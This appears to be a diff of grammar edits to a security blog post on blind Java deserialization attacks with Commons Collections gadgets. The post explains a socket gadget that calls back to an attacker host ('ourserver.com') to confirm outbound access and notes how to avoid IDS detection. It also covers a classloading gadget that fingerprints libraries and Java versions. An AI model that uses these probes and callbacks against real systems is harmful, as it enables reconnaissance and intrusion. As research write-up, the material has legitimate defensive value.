yolosec/deadcodeBlog/_posts/2016-08-03-Blind-Java-Deserialization-Commons-Gadgets.markdown

             }),
 ```

-With this gadget we can send some static data to our server.
+With this gadget, we can send some static data to our server.
 On ourserver.com we trace
 incoming packets.
-If a new TCP connection from our target host is made, with Urgent flag and 0xdd byte we know
+If a new TCP connection from our target host is made with Urgent flag and 0xdd byte, we know
 the JVM is allowed to connect to the remote host.

-_SendUrgentData_ part is optional.
-We can leave it out.
-Firewall may be configured to drop/log Urgent data.
-So we may
+The _sendUrgentData_ part is optional.
+The firewall may be configured to drop/log Urgent data, so without the urgent data,
-avoid detection by IDS without the urgent data.
-Socket should still make TCP handshake - visible in packet trace.
+we may avoid detection by the IDS.
+The socket should still make the TCP handshake - visible in packet trace.

-It would be also nice to call the following gadget to write to the output stream directly:
+It would also be nice to call the following gadget to write to the output stream directly:

 ```java
 Socket.class.getConstructor(String.class, Integer.TYPE).newInstance("ourserver.com", 80).getOutputStream().write(0xdd);
 ```

-But this is not possible due to limitation of reflection invocation properties of [InvokerTransformer](#InvokerTransformer).
+But this is not possible due to the limitation of reflection invocation properties of [InvokerTransformer](#InvokerTransformer).
-For more info why its not possible read article till the end :)
+For more info why it's not possible read this article till the end :)
-(TL;DR: output stream returned is actually SocketOutputStream which is package local - write() method cannot be called this way).
+(TL;DR: the output stream returned is actually SocketOutputStream which is package-local - the write() method cannot be called this way).

 ### Classloading gadgets {#classloader}
 This very simple gadget tries to load a class defined by a fully specified class name.
-If loading of such class ends with an exception we know it was not found by the Classloader.
+If the loading of such class ends with an exception, we know it was not found by the Classloader.

-If vulnerable app behaves differently on exception its straightforward.
-Otherwise
+If a vulnerable app behaves differently on exception, it's straightforward.
+Otherwise,
-we adapt the payload to Sleep after loading the class - if class exists on the classpath, exception is not thrown and Sleep
+we adapt the payload to Sleep after loading the class - if the class exists on the classpath, the exception is not thrown and Sleep
 will get executed.

-Classloading gadget can be used to detect if library is present on the system or to detect major Java version running the application.
+Classloading gadget can be used to detect if a library is present on the system or to detect the major Java version running the application.

 The gadget is: